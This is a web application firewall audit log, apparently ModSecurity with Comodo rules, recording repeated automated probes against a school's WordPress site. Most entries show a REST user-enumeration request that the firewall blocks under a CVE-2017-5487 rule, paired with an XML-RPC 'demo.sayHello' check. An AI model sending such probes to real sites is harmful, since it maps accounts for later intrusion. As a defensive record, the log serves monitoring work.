[uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461798663149 2544 (- - -) Stopwatch2: 1746461798663149 2544; combined=1466, p1=473, p2=962, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0d6a75d-Z-- --c1afce59-A-- [05/May/2025:23:16:41 +0700] aBjkaU2V_h1VFAgsfgZ-PQAAAAY 103.236.140.4 51444 103.236.140.4 8181 --c1afce59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c1afce59-C-- demo.sayHello --c1afce59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1afce59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461801444507 5655 (- - -) Stopwatch2: 1746461801444507 5655; combined=4186, p1=514, p2=3453, p3=32, p4=34, p5=91, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1afce59-Z-- --06a8c17e-A-- [05/May/2025:23:16:47 +0700] aBjkb02V_h1VFAgsfgZ-SAAAAA0 103.236.140.4 51484 103.236.140.4 8181 --06a8c17e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --06a8c17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06a8c17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461807030340 2943 (- - -) Stopwatch2: 1746461807030340 2943; combined=1250, p1=399, p2=823, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06a8c17e-Z-- --8dc6326a-A-- [05/May/2025:23:16:49 +0700] aBjkcU2V_h1VFAgsfgZ-TQAAABc 103.236.140.4 51500 103.236.140.4 8181 --8dc6326a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8dc6326a-C-- demo.sayHello --8dc6326a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dc6326a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461809844578 5900 (- - -) Stopwatch2: 1746461809844578 5900; combined=4391, p1=517, p2=3596, p3=32, p4=34, p5=124, sr=73, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dc6326a-Z-- --6b1c735c-A-- [05/May/2025:23:17:11 +0700] aBjkh02V_h1VFAgsfgZ-VgAAABA 103.236.140.4 51680 103.236.140.4 8181 --6b1c735c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6b1c735c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b1c735c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461831316316 2727 (- - -) Stopwatch2: 1746461831316316 2727; combined=1211, p1=411, p2=770, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b1c735c-Z-- --ee16174c-A-- [05/May/2025:23:17:14 +0700] aBjkigRwKNFSM6B7_LahkgAAAIo 103.236.140.4 51708 103.236.140.4 8181 --ee16174c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee16174c-C-- demo.sayHello --ee16174c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee16174c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461834415762 4866 (- - -) Stopwatch2: 1746461834415762 4866; combined=4006, p1=467, p2=3211, p3=27, p4=30, p5=150, sr=70, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee16174c-Z-- --83a9ed09-A-- [05/May/2025:23:18:18 +0700] aBjkyk2V_h1VFAgsfgZ-gQAAAAk 103.236.140.4 52298 103.236.140.4 8181 --83a9ed09-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --83a9ed09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83a9ed09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461898189467 2175 (- - -) Stopwatch2: 1746461898189467 2175; combined=1181, p1=387, p2=765, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83a9ed09-Z-- --9976c37e-A-- [05/May/2025:23:18:21 +0700] aBjkzU2V_h1VFAgsfgZ-hgAAABI 103.236.140.4 52330 103.236.140.4 8181 --9976c37e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9976c37e-C-- demo.sayHello --9976c37e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9976c37e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461901300815 5568 (- - -) Stopwatch2: 1746461901300815 5568; combined=4105, p1=560, p2=3324, p3=32, p4=37, p5=91, sr=76, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9976c37e-Z-- --9ebcfa10-A-- [05/May/2025:23:20:14 +0700] aBjlPoZWvR7-42f6JrAOxwAAAMI 103.236.140.4 53412 103.236.140.4 8181 --9ebcfa10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ebcfa10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ebcfa10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462014376791 2573 (- - -) Stopwatch2: 1746462014376791 2573; combined=1200, p1=402, p2=770, p3=0, p4=0, p5=28, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ebcfa10-Z-- --7f2e323d-A-- [05/May/2025:23:20:15 +0700] aBjlP4ZWvR7-42f6JrAOyQAAANc 103.236.140.4 53418 103.236.140.4 8181 --7f2e323d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7f2e323d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f2e323d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462015519159 2972 (- - -) Stopwatch2: 1746462015519159 2972; combined=1284, p1=423, p2=826, p3=0, p4=0, p5=34, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f2e323d-Z-- --9297e343-A-- [05/May/2025:23:20:17 +0700] aBjlQQRwKNFSM6B7_LaiBwAAAJc 103.236.140.4 53440 103.236.140.4 8181 --9297e343-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9297e343-C-- demo.sayHello --9297e343-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9297e343-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462017153259 4073 (- - -) Stopwatch2: 1746462017153259 4073; combined=2914, p1=388, p2=2367, p3=22, p4=25, p5=65, sr=52, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9297e343-Z-- --01323650-A-- [05/May/2025:23:20:18 +0700] aBjlQoZWvR7-42f6JrAO0QAAAM8 103.236.140.4 53450 103.236.140.4 8181 --01323650-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01323650-C-- demo.sayHello --01323650-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01323650-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462018296991 5513 (- - -) Stopwatch2: 1746462018296991 5513; combined=4092, p1=528, p2=3343, p3=33, p4=34, p5=91, sr=93, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01323650-Z-- --5eff8518-A-- [05/May/2025:23:24:29 +0700] aBjmPQRwKNFSM6B7_LailgAAAJg 103.236.140.4 55674 103.236.140.4 8181 --5eff8518-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5eff8518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eff8518-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462269226648 2178 (- - -) Stopwatch2: 1746462269226648 2178; combined=1191, p1=388, p2=772, p3=0, p4=0, p5=30, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eff8518-Z-- --e5d0aa37-A-- [05/May/2025:23:24:32 +0700] aBjmQIZWvR7-42f6JrAPWgAAAMM 103.236.140.4 55702 103.236.140.4 8181 --e5d0aa37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.8 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e5d0aa37-C-- demo.sayHello --e5d0aa37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5d0aa37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462272330373 5602 (- - -) Stopwatch2: 1746462272330373 5602; combined=4181, p1=519, p2=3441, p3=31, p4=35, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5d0aa37-Z-- --cbb93e12-A-- [05/May/2025:23:24:34 +0700] aBjmQoZWvR7-42f6JrAPXQAAAM0 103.236.140.4 55726 103.236.140.4 8181 --cbb93e12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cbb93e12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbb93e12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462274922656 2714 (- - -) Stopwatch2: 1746462274922656 2714; combined=1255, p1=408, p2=818, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbb93e12-Z-- --f3006570-A-- [05/May/2025:23:24:37 +0700] aBjmRQRwKNFSM6B7_LaimAAAAJQ 103.236.140.4 55758 103.236.140.4 8181 --f3006570-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f3006570-C-- demo.sayHello --f3006570-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3006570-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462277669037 5463 (- - -) Stopwatch2: 1746462277669037 5463; combined=4266, p1=533, p2=3502, p3=32, p4=36, p5=96, sr=90, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3006570-Z-- --652d425f-A-- [05/May/2025:23:25:21 +0700] aBjmcQRwKNFSM6B7_LaitwAAAIg 103.236.140.4 56242 103.236.140.4 8181 --652d425f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --652d425f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --652d425f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462321765792 2911 (- - -) Stopwatch2: 1746462321765792 2911; combined=1498, p1=558, p2=906, p3=0, p4=0, p5=33, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --652d425f-Z-- --be0c3c68-A-- [05/May/2025:23:25:25 +0700] aBjmdU2V_h1VFAgsfgZ_ugAAAAw 103.236.140.4 56282 103.236.140.4 8181 --be0c3c68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --be0c3c68-C-- demo.sayHello --be0c3c68-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --be0c3c68-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file 